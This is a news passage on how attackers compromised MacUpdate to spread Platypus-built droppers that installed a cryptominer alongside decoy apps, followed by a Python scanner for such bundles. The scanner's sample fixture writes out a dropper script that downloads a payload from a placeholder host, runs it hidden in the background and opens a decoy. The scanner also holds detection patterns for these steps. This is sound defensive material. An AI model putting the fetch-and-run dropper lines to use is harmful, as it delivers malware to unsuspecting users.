Cybercriminals apparently infiltrated the MacUpdate website to distribute the malware. They uploaded modified copies of the apps OnyX, Firefox and Deeper, each carrying a cryptominer, and replaced the download links for these apps with links that led users to malicious domains. According to Thomas Reed from Malwarebytes, the fake domains show URLs that had been modified but still looked legitimate and convincing to users.

OnyX and Deeper are developed by Titanium Software, but the download link on MacUpdate had been maliciously altered to redirect users to download URLs on an unauthentic address. This new domain was registered on 23 January, and its registrant remains hidden. Likewise, the unauthentic Firefox app is distributed from a fake URL instead of the legitimate one.

The user is asked to move the app into the Applications folder, which is a common request even with the original apps. The applications were created with Platypus, a developer tool that produces full macOS apps from scripts such as Python or shell scripts. The MacUpdate trojan/miner is a Platypus dropper that downloads a miner from Adobe Creative Cloud servers. Decoy copies of the authentic app are also bundled with the malware so that users don't get suspicious. “This means the creation of these applications had a low bar for entry,” noted Abbati.
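A quick triage check for the dropper pattern described above (a script-wrapped bundle that fetches a payload and launches a nested decoy copy of the real app), as an added example that is not code from the article, Malwarebytes, SentinelOne or MacUpdate. It assumes two things the article does not state: that a Platypus-built bundle ships `Contents/Resources/script` and `Contents/Resources/AppSettings.plist`, and that the decoy is a second `.app` nested under `Contents/Resources`. The bundle names, script bodies, paths and the `example.invalid` URL in the sample tree are all constructed for the demonstration.

```python
"""Scan an Applications-style folder for Platypus-wrapped bundles showing dropper traits.

Added example, not the article's or any vendor's code. Assumption (not from the
article): Platypus bundles carry Contents/Resources/script and
Contents/Resources/AppSettings.plist; a nested .app in Resources is the decoy.
"""
import os
import plistlib
import re
import tempfile
from dataclasses import dataclass

# Files assumed (not confirmed by the article) to mark a Platypus-built bundle.
PLATYPUS_MARKERS = ("Contents/Resources/script", "Contents/Resources/AppSettings.plist")

# Crude indicators in the wrapped script: downloading a payload, backgrounding it,
# and launching a bundled decoy app so the user sees the program they expected.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bcurl\b.*https?://"),
    re.compile(r"\bnohup\b|&\s*$", re.M),
    re.compile(r"\bopen\b\s+.*\.app"),
]


@dataclass
class Finding:
    bundle: str
    nested_apps: list
    script_hits: list


def is_platypus_bundle(app_dir):
    return all(os.path.exists(os.path.join(app_dir, m)) for m in PLATYPUS_MARKERS)


def nested_app_bundles(app_dir):
    """Decoy candidates: .app bundles packed inside the wrapper's Resources folder."""
    res = os.path.join(app_dir, "Contents", "Resources")
    if not os.path.isdir(res):
        return []
    return sorted(n for n in os.listdir(res) if n.endswith(".app"))


def script_indicators(app_dir):
    """Patterns (by source text) that match the wrapped script, if one is present."""
    path = os.path.join(app_dir, "Contents", "Resources", "script")
    try:
        with open(path, errors="replace") as f:
            text = f.read()
    except OSError:
        return []
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(text)]


def scan_applications(root):
    """One Finding per Platypus-style bundle directly under root (other bundles are skipped)."""
    findings = []
    for name in sorted(os.listdir(root)):
        app = os.path.join(root, name)
        if name.endswith(".app") and is_platypus_bundle(app):
            findings.append(Finding(app, nested_app_bundles(app), script_indicators(app)))
    return findings


def suspicious_bundles(root):
    """{bundle basename: (nested decoys, script indicators)} for bundles with dropper traits."""
    return {os.path.basename(f.bundle): (f.nested_apps, f.script_hits)
            for f in scan_applications(root) if f.nested_apps or f.script_hits}


def build_sample_tree():
    """Constructed sample: a benign Platypus app, a decoy-carrying dropper, a plain app."""
    root = tempfile.mkdtemp(prefix="apps-")

    def make_platypus_app(name, script_body, decoy=None):
        res = os.path.join(root, name, "Contents", "Resources")
        os.makedirs(res)
        with open(os.path.join(res, "script"), "w") as f:
            f.write(script_body)
        with open(os.path.join(res, "AppSettings.plist"), "wb") as f:
            plistlib.dump({"ScriptName": "script", "InterpreterPath": "/bin/sh"}, f)
        if decoy:  # nested decoy copy of the legitimate app
            os.makedirs(os.path.join(res, decoy, "Contents", "MacOS"))

    make_platypus_app("Notes Helper.app", "#!/bin/sh\necho hello\n")
    make_platypus_app(
        "OnyX.app",
        "#!/bin/sh\n"
        "curl -s -o ~/Library/.cache/helper https://example.invalid/payload\n"  # constructed URL
        "nohup ~/Library/.cache/helper &\n"
        "open \"$(dirname \"$0\")/OnyX.app\"\n",
        decoy="OnyX.app",
    )
    os.makedirs(os.path.join(root, "Plain.app", "Contents", "MacOS"))  # not Platypus-built
    return root


if __name__ == "__main__":
    for name, (decoys, hits) in suspicious_bundles(build_sample_tree()).items():
        print(f"{name}: decoys={decoys} indicators={hits}")
```

On a real machine, point `scan_applications` at `/Applications` (and `~/Applications`); a hit only says the bundle is script-wrapped and behaves like a dropper, so follow up by reading the script and checking the bundle's code signature rather than treating the match as proof.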